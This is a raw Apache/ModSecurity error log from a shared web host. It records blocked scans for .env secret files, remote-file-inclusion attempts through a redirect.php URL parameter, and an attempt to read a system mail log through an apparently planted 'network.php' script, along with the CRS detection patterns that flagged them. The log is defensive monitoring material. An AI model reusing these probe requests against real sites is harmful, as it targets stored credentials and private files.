[Mon May 11 14:39:41.564800 2026] [security2:error] [pid 1319886:tid 1319937] [client 208.84.100.197:53976] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm2.rentparadise.fr"] [uri "/backend/.env"] [unique_id "agHODay-5-wpj6Sx56aMAgAAABg"]
[Mon May 11 14:39:41.565006 2026] [security2:error] [pid 1319886:tid 1319937] [client 208.84.100.197:53976] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm2.rentparadise.fr"] [uri "/backend/.env"] [unique_id "agHODay-5-wpj6Sx56aMAgAAABg"]
[Mon May 11 14:39:41.566281 2026] [security2:error] [pid 1319885:tid 1319935] [client 208.84.100.197:53970] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm2.rentparadise.fr"] [uri "/api/.env"] [unique_id "agHODVchVQ3tCn0m9OpL0QAAARc"]
[Mon May 11 14:39:41.567553 2026] [security2:error] [pid 1320398:tid 1320424] [client 208.84.100.197:53968] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm2.rentparadise.fr"] [uri "/app/.env"] [unique_id "agHODeJEyNRN152ArOR-RQAAAFg"]
[Mon May 11 14:39:41.567655 2026] [security2:error] [pid 1319885:tid 1319935] [client 208.84.100.197:53970] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm2.rentparadise.fr"] [uri "/api/.env"] [unique_id "agHODVchVQ3tCn0m9OpL0QAAARc"]
[Mon May 11 14:39:41.567705 2026] [security2:error] [pid 1320398:tid 1320424] [client 208.84.100.197:53968] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm2.rentparadise.fr"] [uri "/app/.env"] [unique_id "agHODeJEyNRN152ArOR-RQAAAFg"]
[Mon May 11 14:39:41.568536 2026] [security2:error] [pid 1320674:tid 1320710] [client 208.84.100.197:53934] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm2.rentparadise.fr"] [uri "/.env"] [unique_id "agHODaO9RdIr1DwxYR2GWAAAANU"]
[Mon May 11 14:39:41.568534 2026] [security2:error] [pid 1319953:tid 1319960] [client 208.84.100.197:53942] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "crm2.rentparadise.fr"] [uri "/.env.local"] [unique_id "agHODeSQ-m-m0ukSSht1pgAAAUU"]
[Mon May 11 14:39:41.568709 2026] [security2:error] [pid 1319953:tid 1319960] [client 208.84.100.197:53942] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm2.rentparadise.fr"] [uri "/.env.local"] [unique_id "agHODeSQ-m-m0ukSSht1pgAAAUU"]
[Mon May 11 14:39:41.568731 2026] [security2:error] [pid 1320674:tid 1320710] [client 208.84.100.197:53934] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "crm2.rentparadise.fr"] [uri "/.env"] [unique_id "agHODaO9RdIr1DwxYR2GWAAAANU"]
[Mon May 11 14:39:41.569391 2026] [core:error] [pid 1319886:tid 1319937] [client 208.84.100.197:53976] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:39:41.570644 2026] [security2:error] [pid 1319886:tid 1319937] [client 208.84.100.197:53976] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm2.rentparadise.fr"] [uri "/index.php"] [unique_id "agHODay-5-wpj6Sx56aMAgAAABg"]
[Mon May 11 14:39:41.571128 2026] [core:error] [pid 1320674:tid 1320710] [client 208.84.100.197:53934] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:39:41.571822 2026] [core:error] [pid 1319953:tid 1319960] [client 208.84.100.197:53942] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:39:41.572022 2026] [core:error] [pid 1319885:tid 1319935] [client 208.84.100.197:53970] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:39:41.572064 2026] [security2:error] [pid 1320674:tid 1320710] [client 208.84.100.197:53934] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm2.rentparadise.fr"] [uri "/index.php"] [unique_id "agHODaO9RdIr1DwxYR2GWAAAANU"]
[Mon May 11 14:39:41.573146 2026] [security2:error] [pid 1319885:tid 1319935] [client 208.84.100.197:53970] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm2.rentparadise.fr"] [uri "/index.php"] [unique_id "agHODVchVQ3tCn0m9OpL0QAAARc"]
[Mon May 11 14:39:41.573241 2026] [security2:error] [pid 1319953:tid 1319960] [client 208.84.100.197:53942] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm2.rentparadise.fr"] [uri "/index.php"] [unique_id "agHODeSQ-m-m0ukSSht1pgAAAUU"]
[Mon May 11 14:39:41.573263 2026] [core:error] [pid 1320674:tid 1320713] [client 208.84.100.197:54018] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:39:41.573278 2026] [core:error] [pid 1320674:tid 1320713] [client 208.84.100.197:54018] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:39:41.576296 2026] [core:error] [pid 1320398:tid 1320424] [client 208.84.100.197:53968] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:39:41.576703 2026] [security2:error] [pid 1320398:tid 1320424] [client 208.84.100.197:53968] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "crm2.rentparadise.fr"] [uri "/index.php"] [unique_id "agHODeJEyNRN152ArOR-RQAAAFg"]
[Mon May 11 14:39:51.757114 2026] [security2:error] [pid 1319953:tid 1319968] [client 72.57.65.225:42539] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://115.190.200.22 found within ARGS:url: http://115.190.200.22:3000/reneegamble615"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHOF-SQ-m-m0ukSSht10AAAAU0"]
[Mon May 11 14:39:51.761126 2026] [security2:error] [pid 1319953:tid 1319968] [client 72.57.65.225:42539] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHOF-SQ-m-m0ukSSht10AAAAU0"]
[Mon May 11 14:39:51.829729 2026] [security2:error] [pid 1319953:tid 1319968] [client 72.57.65.225:42539] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHOF-SQ-m-m0ukSSht10AAAAU0"]
[Mon May 11 14:39:53.190997 2026] [security2:error] [pid 1319998:tid 1320013] [client 152.232.53.53:51903] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://115.190.200.22 found within ARGS:url: http://115.190.200.22:3000/reneegamble615"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHOGat2WtvoFr7xvGzIZgAAAI0"]
[Mon May 11 14:39:53.192096 2026] [security2:error] [pid 1319998:tid 1320013] [client 152.232.53.53:51903] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHOGat2WtvoFr7xvGzIZgAAAI0"]
[Mon May 11 14:39:53.192944 2026] [security2:error] [pid 1319998:tid 1320013] [client 152.232.53.53:51903] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHOGat2WtvoFr7xvGzIZgAAAI0"]
[Mon May 11 14:39:58.328016 2026] [security2:error] [pid 1320398:tid 1320405] [client 196.51.44.17:45068] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://115.190.200.22 found within ARGS:url: http://115.190.200.22:3000/reneegamble615"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHOHuJEyNRN152ArOR-bgAAAEU"]
[Mon May 11 14:39:58.330810 2026] [security2:error] [pid 1320398:tid 1320405] [client 196.51.44.17:45068] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHOHuJEyNRN152ArOR-bgAAAEU"]
[Mon May 11 14:39:58.335266 2026] [security2:error] [pid 1320398:tid 1320405] [client 196.51.44.17:45068] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHOHuJEyNRN152ArOR-bgAAAEU"]
[Mon May 11 14:40:00.772978 2026] [security2:error] [pid 1319998:tid 1320006] [client 23.95.58.128:49144] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: http://115.190.200.22 found within ARGS:url: http://115.190.200.22:3000/reneegamble615"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHOIKt2WtvoFr7xvGzIdAAAAIY"]
[Mon May 11 14:40:00.774183 2026] [security2:error] [pid 1319998:tid 1320006] [client 23.95.58.128:49144] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHOIKt2WtvoFr7xvGzIdAAAAIY"]
[Mon May 11 14:40:00.775306 2026] [security2:error] [pid 1319998:tid 1320006] [client 23.95.58.128:49144] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agHOIKt2WtvoFr7xvGzIdAAAAIY"]
[Mon May 11 14:40:24.251307 2026] [authz_core:error] [pid 1319885:tid 1319895] [client 47.128.28.15:54434] AH01630: client denied by server configuration: /home/tchatboo/public_html/wp-includes/block-bindings/error_log
[Mon May 11 14:41:01.606525 2026] [authz_core:error] [pid 1320398:tid 1320416] [client 85.208.96.203:53318] AH01630: client denied by server configuration: /home/rentpara/public_html/wp-includes/error_log
[Mon May 11 14:41:19.238776 2026] [security2:error] [pid 1320398:tid 1320416] [client 216.73.216.110:26841] ModSecurity: Warning. Matched phrase "var/log/maillog" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/maillog found within ARGS:filesrc: /var/log/maillog-20260510"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHOb-JEyNRN152ArOR_XwAAAFA"]
[Mon May 11 14:41:19.240387 2026] [security2:error] [pid 1320398:tid 1320416] [client 216.73.216.110:26841] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agHOb-JEyNRN152ArOR_XwAAAFA"]
[Mon May 11 14:41:19.332075 2026] [security2:error] [pid 1320398:tid 1320416] [client 216.73.216.110:26841] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agHOb-JEyNRN152ArOR_XwAAAFA"]
[Mon May 11 14:41:33.531626 2026] [:error] [pid 1320398:tid 1320400] [client 123.30.233.13:41812] File does not exist: /home/cpcentre/public_html/wp-login.php
[Mon May 11 14:41:49.744046 2026] [security2:error] [pid 1319886:tid 1319929] [client 43.164.3.23:59190] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agHOjay-5-wpj6Sx56aNIgAAABM"]
[Mon May 11 14:41:50.151463 2026] [security2:error] [pid 1319885:tid 1319930] [client 176.65.139.168:41988] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "test.rentparadise.fr"] [uri "/.env.local"] [unique_id "agHOjlchVQ3tCn0m9OpNBQAAARU"]
[Mon May 11 14:41:50.151845 2026] [security2:error] [pid 1319885:tid 1319930] [client 176.65.139.168:41988] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "test.rentparadise.fr"] [uri "/.env.local"] [unique_id "agHOjlchVQ3tCn0m9OpNBQAAARU"]
[Mon May 11 14:41:50.152266 2026] [security2:error] [pid 1319885:tid 1319930] [client 176.65.139.168:41988] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "test.rentparadise.fr"] [uri "/.env.local"] [unique_id "agHOjlchVQ3tCn0m9OpNBQAAARU"]
[Mon May 11 14:42:17.488069 2026] [ssl:error] [pid 1319885:tid 1319895] [client 199.45.154.159:40034] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname mail.gilours.fr provided via HTTP have no compatible SSL setup for policy 'secure'
[Mon May 11 14:42:21.191095 2026] [core:error] [pid 1319886:tid 1319928] [client 47.128.60.145:20532] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:42:21.191129 2026] [core:error] [pid 1319886:tid 1319928] [client 47.128.60.145:20532] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 14:42:42.566751 2026] [authz_core:error] [pid 1320398:tid 1320402] [client 95.111.239.37:54204] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/error_log, referer: binance.com
[Mon May 11 14:42:50.014481 2026] [authz_core:error] [pid 1319885:tid 1319892] [client 95.111.239.37:56919] AH01630: client denied by server configuration: /home/maelbail/public_html/wp-includes/error_log, referer: binance.com
